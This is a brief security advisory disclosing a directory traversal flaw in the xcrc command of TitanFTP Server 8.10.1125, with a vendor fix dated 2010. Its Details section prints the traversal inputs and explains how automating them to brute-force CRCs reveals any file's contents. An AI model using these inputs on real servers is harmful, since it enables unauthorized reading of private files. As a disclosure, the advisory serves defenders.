Accensus Security Advisory L-02 TitanFtp Server Arbitrary File Disclosure Details ============= Product: TitanFTP Server Security-Risk: high Remote-Exploit: maybe, assuming anonymous ftp access Local-Exploit: yes Vendor URL: http://www.southrivertech.com/ Found By: Bill Finlayson http://www.accensussecurity.com Affected: Versions 8.10.1125 and likely previous Issue: the xcrc command is susceptible to a directory traversal attack which will allow disclosure of the contents of any file on the server Details: xcrc ..//..//..//..//a.txt 1 <some huge number> will disclose the file's size xcrc ..//..//..//..//a.txt 1 2 xcrc ..//..//..//..//a.txt 1 3 ... xcrc ..//..//..//..//a.txt 1 <filesize> when automated allows for an easy brute force attack on the crc's Status: Submitted to Vendor 6/14/10 fixed 6/15/10
